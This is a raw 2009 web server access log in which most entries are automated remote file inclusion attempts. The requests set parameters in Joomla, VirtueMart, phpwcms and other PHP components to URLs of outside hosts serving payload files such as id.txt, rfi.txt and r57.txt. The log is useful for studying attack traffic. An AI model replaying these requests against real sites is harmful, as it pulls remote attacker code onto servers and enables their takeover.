195.137.160.12 - - [08/Sep/2009:03:37:03 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
69.175.25.226 - - [08/Sep/2009:03:37:55 -0500] "GET /logs/access_log.1233705600//include/footer.php?_path[counter]=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
195.137.160.12 - - [08/Sep/2009:03:40:17 -0500] "GET /logs/access_log.1237680000//skin/zero_vote/error.php?dir=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
195.137.160.12 - - [08/Sep/2009:03:40:20 -0500] "GET /logs/access_log.1237680000//skin/zero_vote/error.php?dir=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.189.18.73 - - [08/Sep/2009:03:41:04 -0500] "GET /logs/access_log.1244764800%22%20target=%22_blank/errors.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
211.189.18.73 - - [08/Sep/2009:03:41:05 -0500] "GET /logs/errors.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
211.189.18.73 - - [08/Sep/2009:03:41:05 -0500] "GET /errors.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
211.206.123.177 - - [08/Sep/2009:03:42:15 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 200 204203 "-""libwww-perl/5.79"
211.206.123.177 - - [08/Sep/2009:03:42:15 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 200 3246 "-""libwww-perl/5.79"
211.206.123.177 - - [08/Sep/2009:03:42:16 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 200 204203 "-""libwww-perl/5.79"
211.206.123.177 - - [08/Sep/2009:03:42:16 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 200 3246 "-""libwww-perl/5.79"
80.67.26.40 - - [08/Sep/2009:03:42:33 -0500] "GET /logs/access_log.1231718400/error.php?dir=http://www.hotlinkfiles.com/files/2697513_mgngy/spread.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
80.67.26.40 - - [08/Sep/2009:03:42:33 -0500] "GET /logs/error.php?dir=http://www.hotlinkfiles.com/files/2697513_mgngy/spread.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
80.67.26.40 - - [08/Sep/2009:03:42:33 -0500] "GET /error.php?dir=http://www.hotlinkfiles.com/files/2697513_mgngy/spread.txt??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
80.67.26.40 - - [08/Sep/2009:03:42:42 -0500] "GET /logs/access_log.1247875200/error.php?dir=http://www.hotlinkfiles.com/files/2697513_mgngy/spread.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
82.146.119.209 - - [08/Sep/2009:03:42:46 -0500] "GET /logs//include/footer.php?_path[counter]=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
82.146.119.209 - - [08/Sep/2009:03:42:46 -0500] "GET //include/footer.php?_path[counter]=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
82.146.119.209 - - [08/Sep/2009:03:42:46 -0500] "GET /logs/access_log.1242432000//include/footer.php?_path[counter]=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
211.189.18.73 - - [08/Sep/2009:03:43:14 -0500] "GET /errors.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
211.189.18.73 - - [08/Sep/2009:03:43:14 -0500] "GET /logs/errors.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
82.146.119.209 - - [08/Sep/2009:03:43:34 -0500] "GET /logs/access_log.1233705600//include/footer.php?_path[counter]=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
211.189.18.73 - - [08/Sep/2009:03:43:52 -0500] "GET /errors.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
211.189.18.73 - - [08/Sep/2009:03:43:52 -0500] "GET /logs/errors.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
211.189.18.73 - - [08/Sep/2009:03:46:04 -0500] "GET /logs/access_log.1244764800%22%20target=%22_blank/errors.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
211.189.18.73 - - [08/Sep/2009:03:46:04 -0500] "GET /errors.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
211.189.18.73 - - [08/Sep/2009:03:46:04 -0500] "GET /logs/errors.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
208.64.216.6 - - [08/Sep/2009:03:47:58 -0500] "GET //include/footer.php?_path[counter]=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
208.64.216.6 - - [08/Sep/2009:03:47:59 -0500] "GET /logs//include/footer.php?_path[counter]=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
208.64.216.6 - - [08/Sep/2009:03:47:59 -0500] "GET /logs/access_log.1242518400//include/footer.php?_path[counter]=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
207.58.163.86 - - [08/Sep/2009:03:48:55 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
207.58.163.86 - - [08/Sep/2009:03:48:55 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
207.58.163.86 - - [08/Sep/2009:03:48:55 -0500] "GET /logs/access_log.1247011200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
207.58.163.86 - - [08/Sep/2009:03:48:55 -0500] "GET /logs/access_log.1243814400/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
66.207.172.166 - - [08/Sep/2009:03:49:09 -0500] "GET /logs//include/footer.php?_path[counter]=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
66.207.172.166 - - [08/Sep/2009:03:49:09 -0500] "GET //include/footer.php?_path[counter]=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
66.207.172.166 - - [08/Sep/2009:03:49:09 -0500] "GET /logs/access_log.1242518400//include/footer.php?_path[counter]=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
66.194.251.253 - - [08/Sep/2009:03:49:55 -0500] "GET /logs//include/footer.php?_path[counter]=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
66.194.251.253 - - [08/Sep/2009:03:49:55 -0500] "GET //include/footer.php?_path[counter]=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
216.65.20.79 - - [08/Sep/2009:03:52:36 -0500] "GET /logs//templates/headline_temp.php?nst_inc=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 316 "-""libwww-perl/5.814"
216.65.20.79 - - [08/Sep/2009:03:52:36 -0500] "GET //templates/headline_temp.php?nst_inc=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 311 "-""libwww-perl/5.814"
62.140.23.192 - - [08/Sep/2009:03:53:04 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
62.140.23.192 - - [08/Sep/2009:03:53:04 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
62.140.23.192 - - [08/Sep/2009:03:53:04 -0500] "GET /logs/access_log.1243814400/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
62.140.23.192 - - [08/Sep/2009:03:53:04 -0500] "GET /logs/access_log.1247011200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
61.100.5.136 - - [08/Sep/2009:03:57:15 -0500] "GET /home.php?index=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
61.100.5.136 - - [08/Sep/2009:03:57:15 -0500] "GET /logs/home.php?index=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
61.100.5.136 - - [08/Sep/2009:03:57:15 -0500] "GET /logs/access_log.1238025600/home.php?index=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
61.100.5.136 - - [08/Sep/2009:03:57:33 -0500] "GET /logs/access_log.1239667200/home.php?index=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
216.65.20.79 - - [08/Sep/2009:03:58:11 -0500] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 334 "-""libwww-perl/5.814"
216.65.20.79 - - [08/Sep/2009:03:58:11 -0500] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 329 "-""libwww-perl/5.814"
74.86.17.106 - - [08/Sep/2009:03:59:25 -0500] "GET /logs/access_log.1242518400//include/footer.php?_path[counter]=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
74.86.17.106 - - [08/Sep/2009:03:59:25 -0500] "GET //include/footer.php?_path[counter]=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
74.86.17.106 - - [08/Sep/2009:03:59:25 -0500] "GET /logs//include/footer.php?_path[counter]=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
62.75.202.55 - - [08/Sep/2009:03:59:35 -0500] "GET //includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://fikom.do.am/v6.txt%0D?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
62.75.202.55 - - [08/Sep/2009:03:59:35 -0500] "GET /logs//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://fikom.do.am/v6.txt%0D?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
62.75.202.55 - - [08/Sep/2009:03:59:37 -0500] "GET /logs//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://fikom.do.am/v6.txt%0D?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
62.75.202.55 - - [08/Sep/2009:03:59:38 -0500] "GET //includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://fikom.do.am/v6.txt%0D?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
62.75.202.55 - - [08/Sep/2009:03:59:47 -0500] "GET /logs//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://fikom.do.am/v6.txt%0D?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
62.75.202.55 - - [08/Sep/2009:03:59:47 -0500] "GET //includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://fikom.do.am/v6.txt%0D?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
62.75.202.55 - - [08/Sep/2009:04:00:40 -0500] "GET //includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
62.75.202.55 - - [08/Sep/2009:04:00:40 -0500] "GET /logs//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
62.75.202.55 - - [08/Sep/2009:04:00:40 -0500] "GET /logs/access_log.1236211200//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
211.233.69.41 - - [08/Sep/2009:04:02:09 -0500] "GET /home.php?index=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
211.233.69.41 - - [08/Sep/2009:04:02:10 -0500] "GET /logs/home.php?index=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
211.233.69.41 - - [08/Sep/2009:04:02:24 -0500] "GET /logs/access_log.1238025600/home.php?index=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
211.233.69.41 - - [08/Sep/2009:04:02:51 -0500] "GET /logs/access_log.1239667200/home.php?index=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
62.75.202.55 - - [08/Sep/2009:04:04:23 -0500] "GET /logs/access_log.1237075200//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
65.55.107.180 - - [08/Sep/2009:04:05:19 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.107.180 - - [08/Sep/2009:04:06:06 -0500] "GET /logs/access_log.1239235200 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
85.214.91.139 - - [08/Sep/2009:04:06:44 -0500] "GET /logs/access_log.1244246400//admin/config_settings.tpl.php?include_path=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
85.214.91.139 - - [08/Sep/2009:04:06:44 -0500] "GET //admin/config_settings.tpl.php?include_path=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
85.214.91.139 - - [08/Sep/2009:04:06:49 -0500] "GET /logs//admin/config_settings.tpl.php?include_path=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
85.214.91.139 - - [08/Sep/2009:04:06:49 -0500] "GET /logs/access_log.1243641600//admin/config_settings.tpl.php?include_path=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
85.214.91.139 - - [08/Sep/2009:04:06:59 -0500] "GET //admin/config_settings.tpl.php?include_path=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
85.214.91.139 - - [08/Sep/2009:04:06:59 -0500] "GET /logs//admin/config_settings.tpl.php?include_path=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
85.214.91.139 - - [08/Sep/2009:04:07:02 -0500] "GET /logs/access_log.1244246400//admin/config_settings.tpl.php?include_path=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
85.214.91.139 - - [08/Sep/2009:04:07:02 -0500] "GET /logs/access_log.1243641600//admin/config_settings.tpl.php?include_path=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
85.214.91.139 - - [08/Sep/2009:04:07:07 -0500] "GET /logs//admin/config_settings.tpl.php?include_path=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
85.214.91.139 - - [08/Sep/2009:04:07:08 -0500] "GET //admin/config_settings.tpl.php?include_path=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
85.214.91.139 - - [08/Sep/2009:04:07:11 -0500] "GET /logs/access_log.1243641600//admin/config_settings.tpl.php?include_path=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
85.214.91.139 - - [08/Sep/2009:04:07:12 -0500] "GET /logs/access_log.1244246400//admin/config_settings.tpl.php?include_path=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
211.206.123.177 - - [08/Sep/2009:04:07:13 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 200 204203 "-""libwww-perl/5.79"
211.206.123.177 - - [08/Sep/2009:04:07:14 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 200 3246 "-""libwww-perl/5.79"
59.24.49.35 - - [08/Sep/2009:04:07:20 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
59.24.49.35 - - [08/Sep/2009:04:07:20 -0500] "GET /logs/access_log.1236211200//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
59.24.49.35 - - [08/Sep/2009:04:07:20 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
59.24.49.35 - - [08/Sep/2009:04:07:31 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
59.24.49.35 - - [08/Sep/2009:04:07:31 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
59.24.49.35 - - [08/Sep/2009:04:07:31 -0500] "GET /logs/access_log.1236211200//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
211.206.123.177 - - [08/Sep/2009:04:07:43 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 200 204203 "-""libwww-perl/5.79"
211.206.123.177 - - [08/Sep/2009:04:07:44 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 200 3246 "-""libwww-perl/5.79"
65.55.106.235 - - [08/Sep/2009:04:08:32 -0500] "GET /logs/access_log.1136592000 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
199.120.90.223 - - [08/Sep/2009:04:09:37 -0500] "GET /logs/access_log.1246752000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
91.202.4.158 - - [08/Sep/2009:04:09:52 -0500] "GET /logs//admin/config_settings.tpl.php?include_path=http://cr0d.interfree.it/bovsp.txt?????&mode=id HTTP/1.1" 404 318 "-""-"
91.202.4.158 - - [08/Sep/2009:04:09:52 -0500] "GET //admin/config_settings.tpl.php?include_path=http://cr0d.interfree.it/bovsp.txt?????&mode=id HTTP/1.1" 404 313 "-""-"
211.206.123.177 - - [08/Sep/2009:04:14:58 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 200 204203 "-""libwww-perl/5.79"
211.206.123.177 - - [08/Sep/2009:04:14:58 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 200 3246 "-""libwww-perl/5.79"
203.185.129.45 - - [08/Sep/2009:04:15:46 -0500] "GET /logs/access_log.1230249600/errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
203.185.129.45 - - [08/Sep/2009:04:15:47 -0500] "GET /logs/errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
203.185.129.45 - - [08/Sep/2009:04:15:47 -0500] "GET /errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
199.120.90.223 - - [08/Sep/2009:04:15:51 -0500] "GET //components/com_virtuemart/export.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
199.120.90.223 - - [08/Sep/2009:04:15:52 -0500] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
199.120.90.223 - - [08/Sep/2009:04:15:52 -0500] "GET /logs/access_log.1241568000//components/com_virtuemart/export.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
203.185.129.45 - - [08/Sep/2009:04:16:22 -0500] "GET /errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
203.185.129.45 - - [08/Sep/2009:04:16:22 -0500] "GET /logs/access_log.1230249600/errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
203.185.129.45 - - [08/Sep/2009:04:16:22 -0500] "GET /logs/errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
211.206.123.177 - - [08/Sep/2009:04:16:29 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 200 204203 "-""libwww-perl/5.79"
211.206.123.177 - - [08/Sep/2009:04:16:29 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 200 3246 "-""libwww-perl/5.79"
88.228.164.236 - - [08/Sep/2009:04:17:04 -0500] "GET http://fortpit.pconline.com/logs/includes/header.php?systempath=http://www.invasaohacking.com/r57.txt? HTTP/1.0" 404 295 "-""-"
199.120.90.223 - - [08/Sep/2009:04:17:20 -0500] "GET //components/com_virtuemart/export.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
199.120.90.223 - - [08/Sep/2009:04:17:21 -0500] "GET /logs/access_log.1241568000//components/com_virtuemart/export.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
199.120.90.223 - - [08/Sep/2009:04:17:21 -0500] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
211.206.123.177 - - [08/Sep/2009:04:17:22 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 200 204203 "-""libwww-perl/5.79"
211.206.123.177 - - [08/Sep/2009:04:17:23 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 200 3246 "-""libwww-perl/5.79"
218.27.203.107 - - [08/Sep/2009:04:18:40 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
218.27.203.107 - - [08/Sep/2009:04:18:41 -0500] "GET /logs/access_log.1236211200///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 383 "-""Mozilla/5.0"
218.27.203.107 - - [08/Sep/2009:04:18:43 -0500] "GET /logs/access_log.1237075200///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 383 "-""Mozilla/5.0"
77.221.130.4 - - [08/Sep/2009:04:19:16 -0500] "GET /logs/access_log.1232755200//include/admin.lib.inc.php?site_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
77.221.130.4 - - [08/Sep/2009:04:19:16 -0500] "GET //include/admin.lib.inc.php?site_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
77.221.130.4 - - [08/Sep/2009:04:19:16 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
77.221.130.4 - - [08/Sep/2009:04:19:22 -0500] "GET /logs/access_log.1232755200//include/admin.lib.inc.php?site_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
77.221.130.4 - - [08/Sep/2009:04:19:22 -0500] "GET //include/admin.lib.inc.php?site_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
77.221.130.4 - - [08/Sep/2009:04:19:22 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
77.221.130.4 - - [08/Sep/2009:04:19:41 -0500] "GET /logs/access_log.1241222400//include/admin.lib.inc.php?site_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
77.221.130.4 - - [08/Sep/2009:04:19:45 -0500] "GET /logs/access_log.1241222400//include/admin.lib.inc.php?site_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
64.6.232.171 - - [08/Sep/2009:04:20:59 -0500] "GET /become_editor.php?theme_path=http://kpu.feelmuziq.com/comm/attach/perkosa.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
64.6.232.171 - - [08/Sep/2009:04:20:59 -0500] "GET /logs/become_editor.php?theme_path=http://kpu.feelmuziq.com/comm/attach/perkosa.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
